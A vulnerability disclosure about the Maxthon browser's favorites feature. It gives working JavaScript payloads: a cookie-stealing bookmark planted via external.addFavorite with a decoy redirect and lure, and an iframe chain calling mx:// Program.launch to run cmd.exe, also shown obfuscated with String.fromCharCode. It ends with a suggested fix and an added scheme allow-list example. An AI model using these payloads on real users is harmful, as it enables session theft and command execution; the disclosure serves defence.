Maxthon (Aoyou) Browser Remote Code Execution Vulnerability / Cookie Stealing
Remote code execution (of limited practical value) caused by a poorly designed feature.
We found that a javascript: pseudo-protocol URL can be added directly through Maxthon's favorites feature, and when the favorite is opened it runs in the domain of the current page.
So there is a problem: if the current page is qq.com or baidu.com,
an attacker who gets the user to open that URL from the favorites bar can execute JavaScript in the domain of the current page.
Firefox avoids this problem by first opening about:blank and only then redirecting to the favorite's address.
1. Cookie Theft
How to add the favorite to the victim's browser
Maxthon supports external.addFavorite, while most other WebKit-based browsers do not allow it.
Running
external.addFavorite("javascript:alert(document.cookie)","TEST")
displays a confirmation dialog.
This is one of the weak points of the attack, but sites such as pornographic ones can still lure users into confirming the prompt.
You can also execute the malicious JavaScript first and then redirect to a real website so the favorite looks less suspicious.
For example
external.addFavorite("javascript:alert(document.cookie);location.href=\"http://www.wooyun.org/\"","I'm a porn website")
2. Code Execution
Many people like to open a new tab and then click an address in the bookmarks bar.
Maxthon's new tab page lives under the mx:// scheme, and a lot more is possible in that domain.
There is an API, maxthon.program.Program.launch, in mx://res/notification/
that can execute commands.
You can load mx://res/notification/ directly in an iframe.
var s=document.createElement("iframe");s.src="mx://res/notification/";s.onload=function(){s.contentWindow.maxthon.program.Program.launch("C:/windows/system32/cmd.exe","")};document.body.appendChild(s);
Encoded with String.fromCharCode (decodes to the snippet above):
String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 105, 102, 114, 97, 109, 101, 34, 41, 59, 115, 46, 115, 114, 99, 61, 34, 109, 120, 58, 47, 47, 114, 101, 115, 47, 110, 111, 116, 105, 102, 105, 99, 97, 116, 105, 111, 110, 47, 34, 59, 115, 46, 111, 110, 108, 111, 97, 100, 61, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 10, 10, 123, 115, 46, 99, 111, 110, 116, 101, 110, 116, 87, 105, 110, 100, 111, 119, 46, 109, 97, 120, 116, 104, 111, 110, 46, 112, 114, 111, 103, 114, 97, 109, 46, 80, 114, 111, 103, 114, 97, 109, 46, 108, 97, 117, 110, 99, 104, 40, 34, 67, 58, 47, 119, 105, 110, 100, 111, 119, 115, 47, 115, 121, 115, 116, 101, 109, 51, 50, 47, 99, 109, 100, 46, 101, 120, 101, 34, 44, 34, 34, 41, 125, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59)
cmd.exe is launched successfully.
A phishing PoC can then be written.
The command runs as soon as the bookmark is clicked from a page under mx://, such as the history page.
After the malicious code runs, redirecting to a website makes the user think it was a normal bookmark.
Solution:
Follow Firefox's approach: when a user opens a bookmark, open a blank page first and then redirect to the bookmark's address.
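As an added illustration of the mitigation side (not code from the original report or from Maxthon): a scheme allow-list check that a favorites feature could apply before storing a URL, so a javascript: target, or a privileged internal scheme such as mx://, is never saved and later opened in the context of the current page. The function name, the allow-list and the sample inputs are assumptions for this example.

```javascript
// Added example: allow-list check for URLs handed to a bookmark/favorites
// feature. Not Maxthon's own code; names and samples are assumptions.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

function isSafeBookmarkUrl(rawUrl) {
  if (typeof rawUrl !== "string") return false;
  // Browsers strip leading/trailing ASCII whitespace and embedded tab/CR/LF
  // before reading the scheme, so "  java\tscript:" still means javascript:.
  // Normalise the same way so the check sees what the browser would see.
  const cleaned = rawUrl.trim().replace(/[\t\r\n]/g, "");
  let parsed;
  try {
    parsed = new URL(cleaned);   // relative or malformed input is rejected
  } catch {
    return false;
  }
  // URL() lowercases the scheme, so "JaVaScRiPt:" compares as "javascript:".
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Constructed sample inputs mirroring the cases discussed in the report.
const SAMPLES = [
  "https://example.com/page",                  // ordinary bookmark: allowed
  "javascript:alert(document.cookie)",         // cookie theft case: rejected
  "JaVaScRiPt:alert(1)",                       // mixed case: rejected
  "  java\tscript:alert(1)",                   // whitespace trick: rejected
  "mx://res/notification/",                    // privileged internal page
  "data:text/html,<script>alert(1)</script>",  // other script-bearing scheme
  "not a url",                                 // unparsable: rejected
];

function classify(urls) {
  return urls.map((u) => ({ url: u, allowed: isSafeBookmarkUrl(u) }));
}
```

The same check belongs at open time as well as at add time, since bookmarks imported or synced from elsewhere bypass the add path.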